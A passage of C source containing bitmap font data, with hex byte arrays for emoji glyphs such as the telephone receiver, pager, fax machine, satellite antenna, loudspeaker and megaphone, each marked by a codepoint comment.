0x0, 0x0, 0x1, 0x80, 0xf, 0xe, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x18, 0x1, 0xe0, 0xe0, 0x0,
0xe, 0x0, 0x0, 0x1, 0xc0, 0x78, 0xe, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x1e, 0x1e, 0x0, 0xe0,
0x0, 0xe, 0x0, 0x0, 0x3, 0xff, 0x80, 0xe,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x3f, 0xe0, 0x0,
0xe0, 0x0, 0xe, 0x0, 0x0, 0x3, 0xf8, 0x0,
0xe, 0x0, 0x0, 0xe0, 0x7c, 0xf8, 0x1e, 0x0,
0x0, 0xe0, 0x0, 0xe, 0x4, 0x78, 0xff, 0x0,
0x0, 0xe, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x0, 0x0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x0, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x0,
/* U+1F4DE "📞" */
0x0, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe1, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xfe, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xc1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x70, 0xf0, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x70, 0x1c, 0x18, 0x0, 0x0, 0x0, 0x0,
0x0, 0x78, 0x7, 0x6, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0x1, 0xc3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x70, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x1c, 0x70, 0x0, 0x0, 0x0,
0x0, 0xe, 0x0, 0x7, 0x18, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x1, 0xcc, 0x0, 0x0, 0x0,
0x0, 0x3, 0x80, 0x0, 0x66, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x0, 0x33, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x1d, 0x80, 0x0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x7, 0x80, 0x0, 0x0,
0x0, 0x0, 0x38, 0x0, 0x7, 0x80, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x7, 0x0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x3, 0x80, 0x1, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x1, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0x0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x7, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x70, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x3c,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0,
0xf, 0x0, 0x0, 0xfc, 0x0, 0x0, 0xf, 0x0,
0x3, 0xc0, 0x0, 0xff, 0x80, 0x0, 0x3, 0xc0,
0x0, 0xf0, 0x0, 0xe1, 0xf0, 0x0, 0x0, 0xe0,
0x0, 0x1e, 0x0, 0xf0, 0x3c, 0x0, 0x0, 0x38,
0x0, 0x7, 0xc1, 0xff, 0x7, 0x0, 0x0, 0xe,
0x0, 0x0, 0xff, 0xe7, 0xc1, 0xc0, 0x0, 0x3,
0x80, 0x0, 0x1f, 0x80, 0x70, 0x70, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x7, 0x86, 0x0, 0x0,
0xe, 0x0, 0x0, 0x0, 0x1, 0xe1, 0x80, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x70, 0xc0, 0x0,
0x0, 0xf0, 0x0, 0x0, 0x0, 0x1c, 0x30, 0x0,
0x0, 0x3c, 0x0, 0x0, 0x0, 0x7, 0x18, 0x0,
0x0, 0x7, 0x80, 0x0, 0x0, 0x1, 0x8c, 0x0,
0x0, 0x1, 0xe0, 0x0, 0x0, 0x0, 0xe6, 0x0,
0x0, 0x0, 0x7c, 0x0, 0x0, 0x0, 0x37, 0x0,
0x0, 0x0, 0xf, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0xf, 0x0,
0x0, 0x0, 0x0, 0x7c, 0x0, 0x0, 0xf, 0x0,
0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0xf, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0xf, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0xc0, 0x1e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xf8, 0x0,
/* U+1F4DF "📟" */
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x8f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x77, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x3, 0xf0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff,
0x81, 0xf8, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0xfc, 0x1f, 0xff, 0xf8, 0x7e, 0x1f, 0x87,
0xf0, 0x7e, 0xf, 0xff, 0xfc, 0x3f, 0xf, 0xc3,
0xf8, 0x3f, 0x7, 0xff, 0x99, 0xe6, 0x79, 0x9e,
0x7c, 0x1f, 0x83, 0xff, 0xcc, 0xf3, 0x3c, 0xcf,
0x3e, 0xf, 0xc1, 0xff, 0xe6, 0x79, 0x9e, 0x67,
0x9f, 0x7, 0xe0, 0xff, 0xff, 0xe3, 0xf8, 0xfc,
0x3f, 0x83, 0xf0, 0x7f, 0xff, 0xe1, 0xf8, 0x7e,
0x1f, 0xc1, 0xf8, 0x3f, 0xff, 0xf8, 0xfe, 0x3f,
0xf, 0xe0, 0xfc, 0x1f, 0xfe, 0x7f, 0x9f, 0xe6,
0x79, 0xf0, 0x7e, 0xf, 0xff, 0x3f, 0xcf, 0xf3,
0x3c, 0xf8, 0x3f, 0x7, 0xff, 0x9f, 0xe7, 0xf9,
0x9e, 0x7c, 0x1f, 0x83, 0xff, 0xff, 0x8f, 0xe3,
0xf0, 0xfe, 0xf, 0xc1, 0xff, 0xff, 0x87, 0xe1,
0xf8, 0x7f, 0x7, 0xe0, 0x7f, 0xff, 0xe3, 0xf8,
0xfc, 0x3f, 0x83, 0xf0, 0x3f, 0xff, 0xff, 0xff,
0xff, 0xff, 0x81, 0xf8, 0xf, 0xff, 0xff, 0xff,
0xff, 0xff, 0x80, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x7f, 0x83, 0xfc,
0x1f, 0xe0, 0xff, 0x3, 0xf0, 0x7f, 0xe3, 0xff,
0x1f, 0xf8, 0xff, 0xc1, 0xf8, 0x38, 0x71, 0xe7,
0x8f, 0x3c, 0x70, 0xe0, 0xfc, 0x1c, 0x38, 0xe3,
0xc7, 0x8e, 0x30, 0x30, 0x7e, 0xe, 0x1c, 0x79,
0xe3, 0xcf, 0x1c, 0x38, 0x3f, 0x7, 0xde, 0x3f,
0xf1, 0xff, 0x8f, 0xfc, 0x1f, 0x81, 0xfe, 0xf,
0xf0, 0x7f, 0x83, 0xfc, 0xf, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xb8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x9c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc7, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xc1, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x0,
/* U+1F4E0 "📠" */
0x0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xfc, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x3, 0x0, 0x0, 0x0, 0x3,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0,
0x0, 0x3, 0x0, 0x0, 0x0, 0x0, 0x18, 0x7f,
0xff, 0xfe, 0x18, 0x0, 0x0, 0x0, 0x0, 0xc3,
0xff, 0xff, 0xf0, 0xc0, 0x0, 0x0, 0x0, 0x6,
0x1f, 0xff, 0xff, 0x87, 0x0, 0x0, 0x0, 0x0,
0x30, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0,
0x0, 0xe, 0x3f, 0xff, 0xff, 0xe, 0x0, 0x0,
0x0, 0x0, 0x71, 0xff, 0xff, 0xf8, 0x70, 0x0,
0x0, 0x0, 0x3, 0x8f, 0xff, 0xff, 0xc3, 0x80,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x7, 0xff, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x30, 0x0, 0x0, 0xff, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0x80, 0x1f, 0xf0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0x1, 0xc7, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x38, 0xe, 0x38, 0x7,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0x61, 0xc0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x7, 0x3, 0xc,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x18,
0xe0, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0,
0xc7, 0x1, 0xf0, 0x7f, 0xff, 0x87, 0x77, 0xe,
0xe, 0x38, 0xf, 0x87, 0xff, 0xfe, 0x3b, 0xb8,
0x30, 0x71, 0xc0, 0x6c, 0x3f, 0xff, 0xf0, 0x0,
0x1, 0x83, 0x8c, 0x3, 0x61, 0xff, 0xff, 0x80,
0x0, 0xc, 0x1c, 0x60, 0x1b, 0x7, 0xff, 0xf8,
0x0, 0x0, 0x60, 0xe3, 0x0, 0xd8, 0x0, 0x0,
0x1, 0x99, 0x83, 0x87, 0x38, 0xe, 0xc0, 0x0,
0x0, 0xc, 0xcc, 0x1c, 0x31, 0xc0, 0x76, 0x1c,
0x78, 0xf0, 0x0, 0x0, 0xe1, 0x8e, 0x3, 0xb0,
0xe3, 0xc7, 0xc0, 0x0, 0x7, 0xc, 0x70, 0x1d,
0x87, 0xc, 0x1c, 0x0, 0x0, 0x38, 0x63, 0x80,
0xec, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc3, 0x18,
0x7, 0x60, 0x0, 0x0, 0x0, 0x0, 0x6, 0x18,
0xc0, 0x3b, 0xc, 0x18, 0x38, 0x3f, 0xe0, 0x31,
0xce, 0x0, 0xf8, 0xf1, 0xe1, 0xe1, 0xff, 0x1,
0x8e, 0x70, 0x7, 0xc3, 0xe, 0xe, 0x0, 0x0,
0xe, 0x73, 0x80, 0x1e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x73, 0x9c, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x9c, 0xe0, 0x7, 0x8e, 0xc, 0xe,
0x1f, 0xf0, 0x1c, 0xe7, 0x0, 0x7c, 0x70, 0xf0,
0xf0, 0xff, 0x80, 0xe6, 0x38, 0x3, 0xe3, 0x87,
0x83, 0x80, 0x0, 0x3, 0x31, 0xe0, 0x3e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x19, 0x87, 0x83, 0xf0,
0x0, 0x0, 0x0, 0x38, 0x0, 0xcc, 0x3f, 0xff,
0x7, 0xf, 0x7, 0x3, 0xe0, 0x6, 0x60, 0xff,
0xf0, 0x38, 0x78, 0x3c, 0x1f, 0x0, 0x3f, 0x3,
0xfe, 0x1, 0xc3, 0xc1, 0xc0, 0x70, 0x1, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x1f, 0xff,
0xff, 0xff, 0xe0, 0x1, 0xf8, 0x0, 0x0, 0xff,
0xff, 0xff, 0xff, 0x0, 0xe, 0xc0, 0x0, 0x7,
0xff, 0xff, 0xff, 0xf8, 0x0, 0x66, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x83,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
/* U+1F4E1 "📡" */
0x7, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xff, 0xfc, 0x0, 0x0, 0x0, 0x6, 0x0, 0x1e,
0x3, 0xf8, 0x0, 0x0, 0x0, 0x78, 0x0, 0xc0,
0x1, 0xf8, 0x0, 0x0, 0x7, 0xe0, 0xc, 0x0,
0x3, 0xf0, 0x0, 0x0, 0x7f, 0x0, 0x60, 0x0,
0x3, 0xe0, 0x0, 0x7, 0xf0, 0x3, 0x0, 0x0,
0x7, 0xc0, 0x0, 0x7f, 0x0, 0x18, 0x0, 0x0,
0xf, 0x0, 0x1f, 0xf0, 0x0, 0xc0, 0x0, 0x0,
0x1e, 0x3, 0xff, 0x0, 0x7, 0x0, 0x0, 0x0,
0x7c, 0x7e, 0xf8, 0x0, 0x38, 0x0, 0x0, 0x0,
0xff, 0xcf, 0x80, 0x1, 0xc0, 0x0, 0x0, 0x1,
0xf8, 0xec, 0x0, 0x7, 0x0, 0x0, 0x0, 0x3f,
0x8e, 0x60, 0x0, 0x38, 0x0, 0x0, 0xf, 0xef,
0xf7, 0x0, 0x1, 0xe0, 0x0, 0x1, 0xf8, 0x3f,
0x38, 0x0, 0xf, 0x80, 0x0, 0x3f, 0x0, 0xf1,
0xc0, 0x0, 0x7c, 0x0, 0x7, 0xe0, 0x7, 0xee,
0x0, 0x1, 0xf0, 0x0, 0xfc, 0x0, 0x77, 0xe0,
0x0, 0xd, 0xc0, 0x1f, 0x80, 0x7, 0x9f, 0x0,
0x0, 0x77, 0x7, 0xe0, 0x0, 0x78, 0x78, 0x0,
0x1, 0xb8, 0xfc, 0x0, 0x3, 0x81, 0xe0, 0x0,
0xe, 0xff, 0x80, 0x0, 0x38, 0xf, 0x80, 0x0,
0x33, 0xf0, 0x0, 0x3, 0x80, 0x7e, 0x0, 0x1,
0xce, 0x0, 0x0, 0x38, 0x3, 0xf8, 0x0, 0xe,
0x38, 0x0, 0x0, 0xc0, 0x1d, 0xe0, 0x0, 0x30,
0xe0, 0x0, 0x0, 0x0, 0xc7, 0x80, 0x1, 0xc3,
0x80, 0x0, 0x0, 0x6, 0x1e, 0x0, 0x7, 0xe,
0x0, 0x0, 0x0, 0x30, 0x78, 0x0, 0x38, 0x38,
0x0, 0x0, 0x3, 0x81, 0xe0, 0x0, 0xe0, 0xf0,
0x0, 0x0, 0x1c, 0x7, 0x80, 0x3, 0x3, 0xc0,
0x0, 0x0, 0xe0, 0x1c, 0x0, 0x1c, 0xf, 0x0,
0x0, 0x7, 0x0, 0xf0, 0x0, 0x70, 0x3c, 0x0,
0x0, 0x38, 0x3, 0xc0, 0x3, 0x80, 0x78, 0x0,
0x1, 0x80, 0xe, 0x0, 0xe, 0x1, 0xe0, 0x0,
0xc, 0x0, 0x78, 0x0, 0x38, 0x7, 0x80, 0x0,
0x60, 0x1, 0xc0, 0x0, 0xe0, 0xf, 0x0, 0x7,
0x0, 0x7, 0x0, 0x7, 0xbe, 0x3c, 0x0, 0x38,
0x0, 0x38, 0x0, 0x1f, 0xf8, 0xf8, 0x1, 0xc0,
0x1, 0xc0, 0x0, 0x78, 0xe1, 0xf0, 0xe, 0x0,
0x7, 0x0, 0x1, 0xc3, 0x83, 0xe0, 0x70, 0x0,
0x38, 0x0, 0xc, 0x9c, 0xf, 0x83, 0x0, 0x1,
0xc0, 0x0, 0x66, 0x60, 0x1f, 0x18, 0x0, 0xe,
0x0, 0x3, 0x23, 0x80, 0x3f, 0xc0, 0x0, 0x70,
0x0, 0x18, 0x1f, 0x80, 0x7e, 0x0, 0x7, 0x80,
0x1, 0xc0, 0xff, 0x0, 0xfe, 0x0, 0x78, 0x0,
0xe, 0x7, 0xff, 0x80, 0xff, 0xff, 0xc0, 0x0,
0x70, 0x38, 0xff, 0xe1, 0xff, 0xf8, 0x0, 0x3,
0x81, 0xc3, 0xff, 0xff, 0xff, 0x0, 0x0, 0x1c,
0xe, 0x1f, 0xff, 0xff, 0xe0, 0x0, 0x0, 0xe0,
0x30, 0xff, 0x0, 0x80, 0x0, 0x0, 0x6, 0x1,
0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x30, 0xf,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x7f,
0xff, 0x80, 0x0, 0x0, 0x0, 0xff, 0x3, 0xff,
0xff, 0x80, 0x0, 0x0, 0xf, 0xff, 0x9f, 0xff,
0xfe, 0x0, 0x0, 0x0, 0xf0, 0x7f, 0xff, 0xf8,
0x78, 0x0, 0x0, 0xe, 0x0, 0x3f, 0xfc, 0x0,
0xe0, 0x0, 0x0, 0xe0, 0x0, 0x1f, 0x0, 0x3,
0x80, 0x0, 0x7, 0x80, 0x0, 0x0, 0x0, 0x3c,
0x0, 0x0, 0x3f, 0x80, 0x0, 0x0, 0x7, 0xe0,
0x0, 0x0, 0x3f, 0xe0, 0x0, 0x7, 0xfc, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
/* U+1F4E2 "📢" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7f, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xff, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xf3, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7e, 0x7f, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x3f, 0x7, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xc0, 0x7f, 0xff, 0x80, 0x0, 0x0,
0x0, 0x7f, 0xe0, 0xf, 0xff, 0xfc, 0x0, 0x7f,
0xff, 0xff, 0xf0, 0x0, 0xff, 0xff, 0xc0, 0x1f,
0xff, 0xff, 0xf0, 0x0, 0xf, 0xff, 0xfc, 0x7,
0xff, 0xff, 0x0, 0x0, 0x1, 0xff, 0xff, 0xe0,
0xf0, 0x3, 0x80, 0x0, 0x0, 0x1f, 0xff, 0xfe,
0x1e, 0x0, 0x38, 0x0, 0x0, 0x1, 0xff, 0xff,
0xe1, 0xc0, 0x7, 0x0, 0x0, 0x0, 0x1f, 0xff,
0xfe, 0x38, 0x0, 0x70, 0x0, 0x0, 0x1, 0xff,
0xff, 0xe3, 0x80, 0x7, 0x0, 0x0, 0x0, 0x1f,
0xff, 0xfe, 0x70, 0x0, 0x70, 0x0, 0x0, 0x3,
0xff, 0xff, 0xf7, 0x0, 0x6, 0x0, 0x0, 0x0,
0x38, 0x7f, 0xff, 0x70, 0x0, 0xe0, 0x0, 0x0,
0x3, 0x80, 0x1f, 0xfe, 0x0, 0xe, 0x0, 0x0,
0x0, 0x38, 0x0, 0x7f, 0xe0, 0x0, 0xe0, 0x0,
0x0, 0x3, 0x80, 0x7, 0xfe, 0x0, 0xe, 0x0,
0x0, 0x0, 0x38, 0x0, 0x3f, 0xe0, 0x0, 0xe0,
0x0, 0x0, 0x3, 0x80, 0x3, 0xfe, 0x0, 0xe,
0x0, 0x0, 0x0, 0x38, 0x0, 0x3f, 0xe0, 0x0,
0xe0, 0x0, 0x0, 0x3, 0x80, 0x3, 0xfe, 0x0,
0xe, 0x0, 0x0, 0x0, 0x38, 0x0, 0x3f, 0xe0,
0x0, 0xe0, 0x0, 0x0, 0x3, 0x80, 0x7, 0xfe,
0x0, 0xe, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7f,
0xe0, 0x0, 0xe0, 0x0, 0x0, 0x3, 0x80, 0x1f,
0xf7, 0x0, 0xe, 0x0, 0x0, 0x0, 0x38, 0x7f,
0xff, 0x70, 0x0, 0x60, 0x0, 0x0, 0x3, 0xff,
0xff, 0xf7, 0x0, 0x7, 0x0, 0x0, 0x0, 0x3f,
0xff, 0xff, 0x38, 0x0, 0x70, 0x0, 0x0, 0x3,
0xff, 0xff, 0xf3, 0x80, 0x7, 0x0, 0x0, 0x0,
0x1f, 0xff, 0xfe, 0x1c, 0x0, 0x70, 0x0, 0x0,
0x1, 0xff, 0xff, 0xe1, 0xe0, 0x3, 0x0, 0x0,
0x0, 0x1f, 0xff, 0xfe, 0xf, 0x0, 0x38, 0x0,
0x0, 0x1, 0xff, 0xff, 0xe0, 0x7f, 0xff, 0xfc,
0x0, 0x0, 0x1f, 0xff, 0xfe, 0x3, 0xff, 0xff,
0xff, 0x0, 0x1, 0xff, 0xff, 0xe0, 0xf, 0xff,
0xff, 0xff, 0x0, 0xf, 0xff, 0xfc, 0x0, 0x30,
0x3, 0xf, 0xfe, 0x0, 0xff, 0xff, 0xc0, 0x3,
0x80, 0x30, 0x1f, 0xfc, 0xf, 0xff, 0xfc, 0x0,
0x18, 0x3, 0x81, 0xc7, 0xf0, 0x7f, 0xff, 0x80,
0x1, 0x80, 0x38, 0xc, 0xf, 0xc7, 0xff, 0xf8,
0x0, 0x1c, 0x1, 0x80, 0xc0, 0x3f, 0x7f, 0xff,
0x80, 0x0, 0xc0, 0x1e, 0x3c, 0x0, 0x7f, 0xff,
0xf0, 0x0, 0xe, 0x0, 0xff, 0x80, 0x1, 0xff,
0xff, 0x0, 0x0, 0xe0, 0x7, 0xf0, 0x0, 0xf,
0xff, 0xe0, 0x0, 0x6, 0x0, 0x6, 0x0, 0x0,
0x3f, 0xfe, 0x0, 0x0, 0x70, 0x0, 0x70, 0x0,
0x0, 0xff, 0xc0, 0x0, 0x7, 0x0, 0x3, 0x0,
0x0, 0x7, 0xf8, 0x0, 0x0, 0x30, 0x0, 0x30,
0x0, 0x0, 0x3f, 0x0, 0x0, 0x3, 0x80, 0x1,
0x80, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x18, 0x0,
0x18, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x80,
0x1, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x18, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x80, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0,
/* U+1F4E3 "📣" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xfe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf7, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3c, 0xff, 0xff, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf, 0x1f, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xc3, 0xff, 0xff, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x7f, 0xff,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0xf,
0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x1, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x7, 0x80, 0x3f, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x1, 0xe0, 0x7, 0xff, 0xff, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x78, 0x0, 0xff, 0xff, 0xfe,
0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0xf, 0xff,
0xff, 0xe0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x1,
0xff, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x3f, 0xff, 0xff, 0xc0, 0x0, 0x0, 0x0,
0xf0, 0x0, 0x7, 0xff, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x3c, 0x0, 0x0, 0xff, 0xff, 0xff, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0xf, 0xff, 0xff,
0xf0, 0x0, 0x0, 0x7, 0x80, 0x60, 0x1, 0xff,
